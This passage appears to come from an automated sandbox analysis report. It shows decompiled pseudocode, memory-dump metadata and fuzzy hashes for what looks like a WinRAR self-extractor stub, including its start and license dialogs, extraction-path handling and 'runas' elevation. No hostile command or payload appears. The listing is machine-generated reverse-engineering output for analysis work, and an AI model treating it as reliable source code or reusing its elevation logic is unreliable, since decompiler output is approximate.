          											if( *((char*)(_t259 + 0x4ad3)) == 0) {
          												E001FA4AA(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
          												_t263 =  *(_t276 + 0x20);
          												 *((intOrPtr*)(_t259 + 8)) = 0;
          												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
          												__eflags = _t170;
          												 *((intOrPtr*)(_t259 + 4)) = 0;
          												 *(_t259 + 0x4acc) = _t170;
          												if(_t170 != 0) {
          													 *((char*)(_t259 + 0x4ad0)) = 0;
          													 *((char*)(_t259 + 0x14)) = 0;
          													 *((char*)(_t259 + 0x2c)) = 0;
          													_t225 =  *(_t276 + 0x1c);
          													goto L15;
          												}
          											} else {
          												 *(_t259 + 0x4acc) = _t263;
          												L15:
          												__eflags =  *(_t276 + 0x2c);
          												 *((char*)(_t259 + 0x4ad3)) = 0;
          												 *(_t259 + 0x4ae0) = _t225;
          												__eflags =  *((char*)(_t259 + 0x14));
          												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
          												if( *((char*)(_t259 + 0x14)) != 0) {
          													L20:
          													__eflags =  *((char*)(_t276 + 0x13));
          													if( *((char*)(_t276 + 0x13)) != 0) {
          														L23:
          														 *((char*)(_t259 + 0x4ad1)) = 1;
          														 *((char*)(_t276 + 0x13)) = 1;
          													} else {
          														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
          														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
          															goto L23;
          														} else {
          															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
          														}
          													}
          													_t273 = _t273 + 0x4ae4;
          													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
          													_t225 = _t225 + 1;
          													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
          													_t208 = _t263 - _t245;
          													__eflags = _t208;
          													 *(_t276 + 0x1c) = _t225;
          													if(_t208 < 0) {
          														L26:
          														__eflags = _t208 - 0x400;
          														if(_t208 >= 0x400) {
          															goto L27;
          														}
          													} else {
          														__eflags =  *((char*)(_t259 + 0x28));
          														if( *((char*)(_t259 + 0x28)) == 0) {
          															goto L26;
          														}
          													}
          												} else {
          													 *((char*)(_t259 + 0x14)) = 1;
          													_push(_t259 + 0x18);
          													_push(_t259 + 4);
          													_t212 = E002033D3(_t216);
          													__eflags = _t212;
          													if(_t212 == 0) {
          														L29:
          														 *((char*)(_t276 + 0x12)) = 1;
          													} else {
          														__eflags =  *((char*)(_t259 + 0x29));
          														if( *((char*)(_t259 + 0x29)) != 0) {
          															L19:
          															_t225 =  *(_t276 + 0x1c);
          															 *((char*)(_t216 + 0xe662)) = 1;
          															goto L20;
          														} else {
          															__eflags =  *((char*)(_t216 + 0xe662));
          															if( *((char*)(_t216 + 0xe662)) == 0) {
          																goto L29;
          															} else {
          																goto L19;
          															}
          														}
          													}
          												}
          											}
          											goto L30;
          											L27:
          											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
          											__eflags = _t225 - _t170;
          										} while (_t225 < _t170);
          									}
          									L30:
          									_t226 =  *(_t276 + 0x14);
          									_t171 = _t226;
          									_t257 = _t171 /  *(_t216 + 0x1c);
          									__eflags = _t171 %  *(_t216 + 0x1c);
          									if(_t171 %  *(_t216 + 0x1c) != 0) {
          										_t257 = _t257 + 1;
          										__eflags = _t257;
          									}
          									_t269 = 0;
          									__eflags = _t226;
          									if(_t226 != 0) {
          										_t247 = 0;
          										_t267 = _t276 + 0x34;
          										_t195 = _t257 * 0x4ae4;
          										__eflags = _t195;
          										 *((intOrPtr*)(_t276 + 0x24)) = 0;
          										 *(_t276 + 0x30) = _t195;
          										do {
          											_t232 = _t267;
          											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
          											_t197 =  *(_t276 + 0x14) - _t269;
          											_t267 = _t267 + 8;
          											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
          											__eflags = _t257 - _t197;
          											if(_t257 < _t197) {
          												_t197 = _t257;
          											}
          											__eflags =  *(_t276 + 0x1c) - 1;
          											 *(_t232 + 4) = _t197;
          											if( *(_t276 + 0x1c) != 1) {
          												E0020045D( *((intOrPtr*)(_t216 + 0x14)), E00206CAC, _t232);
          											} else {
          												E002066A2(_t216, _t248);
          											}
          											_t269 = _t269 + _t257;
          											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
          											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
          											__eflags = _t269 -  *(_t276 + 0x14);
          										} while (_t269 <  *(_t276 + 0x14));
          										_t263 =  *(_t276 + 0x20);
          									}
          									_t270 =  *(_t276 + 0x1c);
          									__eflags = _t270;
          									if(_t270 == 0) {
          										_t268 =  *((intOrPtr*)(_t276 + 0x18));
          										goto L68;
          									} else {
          										E00200697( *((intOrPtr*)(_t216 + 0x14)));
          										 *(_t276 + 0x14) = 0;
          										__eflags = _t270;
          										if(_t270 == 0) {
          											L52:
          											_t175 =  *((intOrPtr*)(_t276 + 0x12));
          											goto L53;
          										} else {
          											_t260 = 0;
          											__eflags = 0;
          											do {
          												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
          												__eflags =  *((char*)(_t272 + 0x4ad1));
          												if( *((char*)(_t272 + 0x4ad1)) != 0) {
          													L47:
          													_t178 = E00206CDB(_t216, _t272);
          													__eflags = _t178;
          													if(_t178 != 0) {
          														goto L48;
          													}
          												} else {
          													_t194 = E00202E2C(_t216, _t272);
          													__eflags = _t194;
          													if(_t194 != 0) {
          														__eflags =  *((char*)(_t272 + 0x4ad1));
          														if( *((char*)(_t272 + 0x4ad1)) == 0) {
          															L48:
          															__eflags =  *((char*)(_t272 + 0x4ad0));
          															if( *((char*)(_t272 + 0x4ad0)) == 0) {
          																__eflags =  *((char*)(_t272 + 0x4ad3));
          																if( *((char*)(_t272 + 0x4ad3)) != 0) {
          																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
          																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
          																	__eflags = _t263 - _t181;
          																	if(_t263 > _t181) {
          																		_t263 = _t263 - _t181;
          																		 *(_t276 + 0x2c) = _t263;
          																		E00210E40(_t230, _t181 + _t230, _t263);
          																		_t276 = _t276 + 0xc;
          																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
          																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
          																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
          																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
          																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
          																		__eflags =  *(_t276 + 0x14);
          																		if( *(_t276 + 0x14) != 0) {
          																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
          																			E0020EA80(_t188, _t272, 0x4ae4);
          																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
          																			_t263 =  *(_t276 + 0x2c);
          																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
          																			 *((char*)(_t272 + 0x4ad3)) = 0;
          																			goto L62;
          																		}
          																		goto L63;
          																	}
          																} else {
          																	__eflags =  *((char*)(_t272 + 0x28));
          																	if( *((char*)(_t272 + 0x28)) != 0) {
          																		_t175 = 1;
          																		 *((char*)(_t276 + 0x12)) = 1;
          																		L53:
          																		__eflags = _t175;
          																		if(_t175 == 0) {
          																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
          																			_t263 = _t263 - _t268;
          																			__eflags = _t263 - 0x400;
          																			if(_t263 < 0x400) {
          																				__eflags = _t263;
          																				if(__eflags >= 0) {
          																					if(__eflags <= 0) {
          																						L63:
          																						_t268 = 0;
          																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
          																						L68:
          																						__eflags =  *((char*)(_t276 + 0x12));
          																						if( *((char*)(_t276 + 0x12)) == 0) {
          																							goto L4;
          																						}
          																					} else {
          																						E00210E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
          																						L62:
          																						_t276 = _t276 + 0xc;
          																						goto L63;
          																					}
          																				}
          																			} else {
          																				_t263 =  *(_t276 + 0x20);
          																				goto L56;
          																			}
          																		}
          																	} else {
          																		goto L51;
          																	}
          																}
          															}
          														} else {
          															goto L47;
          														}
          													}
          												}
          												goto L69;
          												L51:
          												_t260 = _t260 + 0x4ae4;
          												_t193 =  *(_t276 + 0x14) + 1;
          												 *(_t276 + 0x14) = _t193;
          												__eflags = _t193 -  *(_t276 + 0x1c);
          											} while (_t193 <  *(_t276 + 0x1c));
          											goto L52;
          										}
          									}
          									goto L69;
          								}
          							}
          							continue;
          						}
          					}
          					break;
          				}
          				L69:
          				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
          				E002047DA(_t216);
          				_t241 =  *(_t276 + 0x28) * 0x4ae4;
          				_t164 =  *((intOrPtr*)(_t216 + 0x18));
          				_t223 = 5;
          				__eflags = _t164 + _t241 + 0x30;
          				return E0020EA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 85c22a660dacd4786cc9ff9c50ac4d613525f9a375cac2a7ccb6c97971f60b49
          • Instruction ID: 84b78471a5fcb3c83acdd10f70421e7cf2707eaa491ee78a59d9e47bac674fa2
          • Opcode Fuzzy Hash: 85c22a660dacd4786cc9ff9c50ac4d613525f9a375cac2a7ccb6c97971f60b49
          • Instruction Fuzzy Hash: 2CD104B1A143428FDB14CF28C88975BBBE4BF95308F08056DE9449B683D774E978CB96
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 80%
          			E0020A5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
          				void* __ebx;
          				long _t105;
          				long _t106;
          				struct HWND__* _t107;
          				struct HWND__* _t111;
          				void* _t114;
          				void* _t115;
          				int _t116;
          				void* _t133;
          				void* _t137;
          				signed int _t149;
          				struct HWND__* _t152;
          				void* _t163;
          				void* _t166;
          				int _t169;
          				void* _t182;
          				struct HWND__* _t189;
          				void* _t190;
          				long _t195;
          				void* _t220;
          				signed int _t230;
          				void* _t231;
          				void* _t246;
          				long _t247;
          				long _t248;
          				long _t249;
          				signed int _t254;
          				WCHAR* _t255;
          				int _t259;
          				int _t261;
          				void* _t266;
          				void* _t270;
          				signed short _t275;
          				int _t277;
          				struct HWND__* _t279;
          				WCHAR* _t286;
          				WCHAR* _t288;
          				intOrPtr _t290;
          				void* _t299;
          				void* _t300;
          				struct HWND__* _t302;
          				signed int _t305;
          				void* _t306;
          				struct HWND__* _t308;
          				void* _t310;
          				long _t312;
          				struct HWND__* _t315;
          				struct HWND__* _t316;
          				void* _t317;
          				void* _t319;
          				void* _t321;
          				void* _t323;
          
          				_t299 = __edx;
          				_t285 = __ecx;
          				E0020D870(E002214F6, _t321);
          				E0020D940();
          				_t275 =  *(_t321 + 0x10);
          				_t305 =  *(_t321 + 0xc);
          				_t302 =  *(_t321 + 8);
          				if(E001F12D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
          					_t306 = _t305 - 0x110;
          					__eflags = _t306;
          					if(__eflags == 0) {
          						E0020C343(_t299, __eflags, __fp0, _t302);
          						_t105 =  *0x23b704;
          						_t277 = 1;
          						 *0x2375d8 = _t302;
          						 *0x2375c8 = _t302;
          						__eflags = _t105;
          						if(_t105 != 0) {
          							SendMessageW(_t302, 0x80, 1, _t105); // executed
          						}
          						_t106 =  *0x245d04;
          						__eflags = _t106;
          						if(_t106 != 0) {
          							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
          						}
          						_t107 = GetDlgItem(_t302, 0x68);
          						 *(_t321 + 0x14) = _t107;
          						SendMessageW(_t107, 0x435, 0, 0x400000);
          						E002095F8(_t321 - 0x1164, 0x800);
          						_t111 = GetDlgItem(_t302, 0x66);
          						__eflags =  *0x239602;
          						_t308 = _t111;
          						 *(_t321 + 0x10) = _t308;
          						_t286 = 0x239602;
          						if( *0x239602 == 0) {
          							_t286 = _t321 - 0x1164;
          						}
          						SetWindowTextW(_t308, _t286);
          						E00209A32(_t308); // executed
          						_push(0x2375e4);
          						_push(0x2375e0);
          						_push(0x24ce18);
          						_push(_t302);
          						 *0x2375d6 = 0; // executed
          						_t114 = E00209EEF(_t286, _t299, __eflags); // executed
          						__eflags = _t114;
          						if(_t114 == 0) {
          							 *0x2375d1 = _t277;
          						}
          						__eflags =  *0x2375e4;
          						if( *0x2375e4 > 0) {
          							_push(7);
          							_push( *0x2375e0);
          							_push(_t302);
          							E0020B4C7(_t299);
          						}
          						__eflags =  *0x24de20;
          						if( *0x24de20 == 0) {
          							SetDlgItemTextW(_t302, 0x6b, E001FDA42(_t286, 0xbf));
          							SetDlgItemTextW(_t302, _t277, E001FDA42(_t286, 0xbe));
          						}
          						__eflags =  *0x2375e4;
          						if( *0x2375e4 <= 0) {
          							L103:
          							__eflags =  *0x2375d6;
          							if( *0x2375d6 != 0) {
          								L114:
          								__eflags =  *0x2395fc - 2;
          								if( *0x2395fc == 2) {
          									EnableWindow(_t308, 0);
          								}
          								__eflags =  *0x2385f8;
          								if( *0x2385f8 != 0) {
          									E001F1294(_t302, 0x67, 0);
          									E001F1294(_t302, 0x66, 0);
          								}
          								_t115 =  *0x2395fc;
          								__eflags = _t115;
          								if(_t115 != 0) {
          									__eflags =  *0x2375d7;
          									if( *0x2375d7 == 0) {
          										_push(0);
          										_push(_t277);
          										_push(0x111);
          										_push(_t302);
          										__eflags = _t115 - _t277;
          										if(_t115 != _t277) {
          											 *0x22df38();
          										} else {
          											SendMessageW(); // executed
          										}
          									}
          								}
          								__eflags =  *0x2375d1;
          								if( *0x2375d1 != 0) {
          									SetDlgItemTextW(_t302, _t277, E001FDA42(_t286, 0x90));
          								}
          								goto L125;
          							}
          							__eflags =  *0x24ce0c;
          							if( *0x24ce0c != 0) {
          								goto L114;
          							}
          							__eflags =  *0x2395fc;
          							if( *0x2395fc != 0) {
          								goto L114;
          							}
          							__eflags = 0;
          							_t310 = 0xaa;
          							 *((short*)(_t321 - 0x9688)) = 0;
          							do {
          								__eflags = _t310 - 0xaa;
          								if(_t310 != 0xaa) {
          									L109:
          									__eflags = _t310 - 0xab;
          									if(__eflags != 0) {
          										L111:
          										E001FFA89(__eflags, _t321 - 0x9688, " ", 0x2000);
          										E001FFA89(__eflags, _t321 - 0x9688, E001FDA42(_t286, _t310), 0x2000);
          										goto L112;
          									}
          									__eflags =  *0x24de20;
          									if(__eflags != 0) {
          										goto L112;
          									}
          									goto L111;
          								}
          								__eflags =  *0x24de20;
          								if( *0x24de20 == 0) {
          									goto L112;
          								}
          								goto L109;
          								L112:
          								_t310 = _t310 + 1;
          								__eflags = _t310 - 0xb0;
          							} while (__eflags <= 0);
          							_t286 =  *0x2375e8; // 0x0
          							E00208FE6(_t286, __eflags,  *0x230064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
          							_t308 =  *(_t321 + 0x10);
          							goto L114;
          						} else {
          							_push(0);
          							_push( *0x2375e0);
          							_push(_t302); // executed
          							E0020B4C7(_t299); // executed
          							_t133 =  *0x24ce0c;
          							__eflags = _t133;
          							if(_t133 != 0) {
          								__eflags =  *0x2395fc;
          								if(__eflags == 0) {
          									_t288 =  *0x2375e8; // 0x0
          									E00208FE6(_t288, __eflags,  *0x230064,  *(_t321 + 0x14), _t133, 0, 0);
          									L00212B4E( *0x24ce0c);
          									_pop(_t286);
          								}
          							}
          							__eflags =  *0x2395fc - _t277;
          							if( *0x2395fc == _t277) {
          								L102:
          								_push(_t277);
          								_push( *0x2375e0);
          								_push(_t302);
          								E0020B4C7(_t299);
          								goto L103;
          							} else {
          								 *0x22df3c(_t302);
          								__eflags =  *0x2395fc - _t277;
          								if( *0x2395fc == _t277) {
          									goto L102;
          								}
          								__eflags =  *0x239601;
          								if( *0x239601 != 0) {
          									goto L102;
          								}
          								_push(3);
          								_push( *0x2375e0);
          								_push(_t302);
          								E0020B4C7(_t299);
          								__eflags =  *0x24de18;
          								if( *0x24de18 == 0) {
          									goto L102;
          								}
          								_t137 = DialogBoxParamW( *0x230064, L"LICENSEDLG", 0, E0020A3E1, 0);
          								__eflags = _t137;
          								if(_t137 == 0) {
          									L25:
          									 *0x2375d7 = _t277;
          									L26:
          									_push(_t277);
          									L13:
          									EndDialog(_t302, ??); // executed
          									L125:
          									_t116 = _t277;
          									L126:
          									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
          									return _t116;
          								}
          								goto L102;
          							}
          						}
          					}
          					__eflags = _t306 != 1;
          					if(_t306 != 1) {
          						L7:
          						_t116 = 0;
          						goto L126;
          					}
          					_t149 = (_t275 & 0x0000ffff) - 1;
          					__eflags = _t149;
          					if(_t149 == 0) {
          						__eflags =  *0x2375d0;
          						if( *0x2375d0 != 0) {
          							L23:
          							_t312 = 0x800;
          							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
          							__eflags =  *0x2375d0;
          							if( *0x2375d0 == 0) {
          								__eflags =  *0x2375d1;
          								if( *0x2375d1 == 0) {
          									_t152 = GetDlgItem(_t302, 0x68);
          									__eflags =  *0x2375cc;
          									_t279 = _t152;
          									if( *0x2375cc == 0) {
          										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
          										SendMessageW(_t279, 0xc2, 0, 0x2222e4);
          										_t312 = 0x800;
          									}
          									SetFocus(_t279);
          									__eflags =  *0x2385f8;
          									if( *0x2385f8 == 0) {
          										E001FFAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
          										E0020C10F(_t285, _t321 - 0x1164, _t312);
          										E001F3E41(_t321 - 0x4288, 0x880, E001FDA42(_t285, 0xb9), _t321 - 0x1164);
          										_t323 = _t323 + 0x10;
          										_t163 = _t321 - 0x4288;
          									} else {
          										_t163 = E001FDA42(_t285, 0xba);
          									}
          									E0020C190(0, _t163);
          									__eflags =  *0x239601;
          									if( *0x239601 == 0) {
          										E0020C7FC(_t321 - 0x2164);
          									}
          									_push(0);
          									_push(_t321 - 0x2164);
          									 *(_t321 + 0x17) = 0;
          									_t166 = E001F9D3A(0, _t321);
          									_t277 = 1;
          									__eflags = _t166;
          									if(_t166 != 0) {
          										L40:
          										_t300 = E00209A8D(_t321 - 0x2164);
          										 *((char*)(_t321 + 0x13)) = _t300;
          										__eflags = _t300;
          										if(_t300 != 0) {
          											L43:
          											_t169 =  *(_t321 + 0x17);
          											L44:
          											_t285 =  *0x239601;
          											__eflags = _t285;
          											if(_t285 != 0) {
          												L50:
          												__eflags =  *((char*)(_t321 + 0x13));
          												if( *((char*)(_t321 + 0x13)) != 0) {
          													 *0x2375dc = _t277;
          													E001F12B2(_t302, 0x67, 0);
          													E001F12B2(_t302, 0x66, 0);
          													SetDlgItemTextW(_t302, _t277, E001FDA42(_t285, 0xe6)); // executed
          													E001F12B2(_t302, 0x69, _t277);
          													SetDlgItemTextW(_t302, 0x65, 0x2222e4); // executed
          													_t315 = GetDlgItem(_t302, 0x65);
          													__eflags = _t315;
          													if(_t315 != 0) {
          														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
          														__eflags = _t195;
          														SetWindowLongW(_t315, 0xfffffff0, _t195);
          													}
          													_push(5);
          													_push( *0x2375e0);
          													_push(_t302);
          													E0020B4C7(_t300);
          													_push(2);
          													_push( *0x2375e0);
          													_push(_t302);
          													E0020B4C7(_t300);
          													_push(0x24ce18);
          													_push(_t302);
          													 *0x24fe3c = _t277; // executed
          													E0020C6FF(_t285, __eflags); // executed
          													_push(6);
          													_push( *0x2375e0);
          													 *0x24fe3c = 0;
          													_push(_t302);
          													E0020B4C7(_t300);
          													__eflags =  *0x2375d7;
          													if( *0x2375d7 == 0) {
          														__eflags =  *0x2375cc;
          														if( *0x2375cc == 0) {
          															__eflags =  *0x24de2c;
          															if( *0x24de2c == 0) {
          																_push(4);
          																_push( *0x2375e0);
          																_push(_t302);
          																E0020B4C7(_t300);
          															}
          														}
          													}
          													E001F1294(_t302, _t277, _t277);
          													 *0x2375dc =  *0x2375dc & 0x00000000;
          													__eflags =  *0x2375dc;
          													_t182 =  *0x2375d7; // 0x1
          													goto L75;
          												}
          												__eflags = _t285;
          												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
          												__eflags = _t169;
          												L52:
          												__eflags = _t169;
          												 *(_t321 + 0x17) = _t169 == 0;
          												__eflags = _t169;
          												if(_t169 == 0) {
          													L66:
          													__eflags =  *(_t321 + 0x17);
          													if( *(_t321 + 0x17) != 0) {
          														_push(E001FDA42(_t285, 0x9a));
          														E001F3E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
          														E001F6E03(0x2300e0, _t277);
          														E00209735(_t302, _t321 - 0x5688, E001FDA42(0x2300e0, 0x96), 0x30);
          														 *0x2375cc =  *0x2375cc + 1;
          													}
          													L12:
          													_push(0);
          													goto L13;
          												}
          												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
          												_t285 = 0x23b602;
          												E001FE7AA(0x23b602, _t321 - 0x164, 0x80);
          												_push(0x23a602);
          												E001F3E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
          												_t323 = _t323 + 0x14;
          												 *(_t321 - 0x48) = 0x3c;
          												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
          												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
          												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
          												 *(_t321 - 0x40) = _t302;
          												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
          												 *(_t321 - 0x2c) = _t277;
          												 *((intOrPtr*)(_t321 - 0x28)) = 0;
          												 *((intOrPtr*)(_t321 - 0x30)) = 0x2375f8;
          												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
          												 *(_t321 + 8) = _t317;
          												__eflags = _t317;
          												if(_t317 == 0) {
          													 *(_t321 + 0x10) =  *(_t321 + 0x14);
          												} else {
          													 *0x245d08 = 0;
          													_t231 = GetCommandLineW();
          													__eflags = _t231;
          													if(_t231 != 0) {
          														E001FFAB1(0x245d0a, _t231, 0x2000);
          													}
          													E0020A24E(_t285, 0x249d0a, 7);
          													E0020A24E(_t285, 0x24ad0a, 2);
          													E0020A24E(_t285, 0x24bd0a, 0x10);
          													 *0x24ce0b = _t277;
          													_t285 = 0x24cd0a;
          													E001FE90C(_t277, 0x24cd0a, _t321 - 0x164);
          													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
          													E0020EA80(_t238, 0x245d08, 0x7104);
          													_t323 = _t323 + 0xc;
          												}
          												_t220 = ShellExecuteExW(_t321 - 0x48);
          												E001FE957(_t321 - 0x164, 0x80);
          												E001FE957(_t321 - 0x11ca0, 0x430c);
          												__eflags = _t220;
          												if(_t220 == 0) {
          													_t319 =  *(_t321 + 0x10);
          													 *(_t321 + 0x17) = _t277;
          													goto L64;
          												} else {
          													 *0x22df20( *(_t321 - 0x10), 0x2710);
          													_t71 = _t321 + 0xc;
          													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
          													__eflags =  *_t71;
          													_t319 =  *(_t321 + 0x10);
          													while(1) {
          														__eflags =  *_t319;
          														if( *_t319 != 0) {
          															break;
          														}
          														Sleep(0x64);
          														_t230 =  *(_t321 + 0xc) + 1;
          														 *(_t321 + 0xc) = _t230;
          														__eflags = _t230 - 0x64;
          														if(_t230 < 0x64) {
          															continue;
          														}
          														break;
          													}
          													 *0x24de2c =  *(_t321 - 0x10);
          													L64:
          													__eflags =  *(_t321 + 8);
          													if( *(_t321 + 8) != 0) {
          														UnmapViewOfFile(_t319);
          														CloseHandle( *(_t321 + 8));
          													}
          													goto L66;
          												}
          											}
          											__eflags = _t300;
          											if(_t300 == 0) {
          												goto L52;
          											}
          											E001F3E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
          											_t323 = _t323 + 0x10;
          											E001F943C(_t321 - 0x3188);
          											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
          											_push(0x11);
          											_push(_t321 - 0x1164);
          											_t246 = E001F9528(_t321 - 0x3188);
          											 *((char*)(_t321 + 0x13)) = _t246;
          											__eflags = _t246;
          											if(_t246 == 0) {
          												_t247 = GetLastError();
          												__eflags = _t247 - 5;
          												if(_t247 == 5) {
          													 *(_t321 + 0x17) = _t277;
          												}
          											}
          											_t39 = _t321 - 4;
          											 *_t39 =  *(_t321 - 4) | 0xffffffff;
          											__eflags =  *_t39;
          											_t169 = E001F946E(_t321 - 0x3188); // executed
          											_t285 =  *0x239601;
          											goto L50;
          										}
          										_t248 = GetLastError();
          										_t300 =  *((intOrPtr*)(_t321 + 0x13));
          										__eflags = _t248 - 5;
          										if(_t248 != 5) {
          											goto L43;
          										}
          										_t169 = _t277;
          										 *(_t321 + 0x17) = _t169;
          										goto L44;
          									} else {
          										_t249 = GetLastError();
          										__eflags = _t249 - 5;
          										if(_t249 == 5) {
          											L39:
          											 *(_t321 + 0x17) = _t277;
          											goto L40;
          										}
          										__eflags = _t249 - 3;
          										if(_t249 != 3) {
          											goto L40;
          										}
          										goto L39;
          									}
          								} else {
          									_t277 = 1;
          									_t182 = 1;
          									 *0x2375d7 = 1;
          									L75:
          									__eflags =  *0x2375cc;
          									if( *0x2375cc <= 0) {
          										goto L26;
          									}
          									__eflags = _t182;
          									if(_t182 != 0) {
          										goto L26;
          									}
          									 *0x2375d0 = _t277;
          									SetDlgItemTextW(_t302, _t277, E001FDA42(_t285, 0x90));
          									_t290 =  *0x2300e0; // 0x0
          									__eflags = _t290 - 9;
          									if(_t290 != 9) {
          										__eflags = _t290 - 3;
          										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
          										__eflags = _t189;
          										 *(_t321 + 0x14) = _t189;
          										_t316 = _t189;
          									} else {
          										_t316 = 0xa0;
          									}
          									_t190 = E001FDA42(_t290, 0x96);
          									E00209735(_t302, E001FDA42(_t290, _t316), _t190, 0x30);
          									goto L125;
          								}
          							}
          							_t277 = 1;
          							__eflags =  *0x2375d1;
          							if( *0x2375d1 == 0) {
          								goto L26;
          							}
          							goto L25;
          						}
          						__eflags =  *0x24fe3c;
          						if( *0x24fe3c == 0) {
          							goto L23;
          						} else {
          							__eflags =  *0x24fe3d;
          							_t254 = _t149 & 0xffffff00 |  *0x24fe3d == 0x00000000;
          							__eflags = _t254;
          							 *0x24fe3d = _t254;
          							_t255 = E001FDA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
          							_t277 = 1;
          							SetDlgItemTextW(_t302, 1, _t255);
          							while(1) {
          								__eflags =  *0x24fe3d;
          								if( *0x24fe3d == 0) {
          									goto L125;
          								}
          								__eflags =  *0x2375d7;
          								if( *0x2375d7 != 0) {
          									goto L125;
          								}
          								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
          								__eflags = _t259;
          								if(_t259 == 0) {
          									goto L125;
          								} else {
          									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
          									__eflags = _t261;
          									if(_t261 == 0) {
          										TranslateMessage(_t321 - 0x64);
          										DispatchMessageW(_t321 - 0x64);
          									}
          									continue;
          								}
          							}
          							goto L125;
          						}
          					}
          					_t266 = _t149 - 1;
          					__eflags = _t266;
          					if(_t266 == 0) {
          						_t277 = 1;
          						__eflags =  *0x2375dc;
          						 *0x2375d7 = 1;
          						if( *0x2375dc == 0) {
          							goto L12;
          						}
          						__eflags =  *0x2375cc;
          						if( *0x2375cc != 0) {
          							goto L125;
          						}
          						goto L12;
          					}
          					__eflags = _t266 == 0x65;
          					if(_t266 == 0x65) {
          						_t270 = E001F1217(_t302, E001FDA42(_t285, 0x64), _t321 - 0x1164);
          						__eflags = _t270;
          						if(_t270 != 0) {
          							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
          						}
          						goto L1;
          					}
          					goto L7;
          				}
          				L1:
          				_t116 = 1;
          				goto L126;
          			}

          APIs
          • __EH_prolog.LIBCMT ref: 0020A5D6
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          Strings
          Memory Dump Source
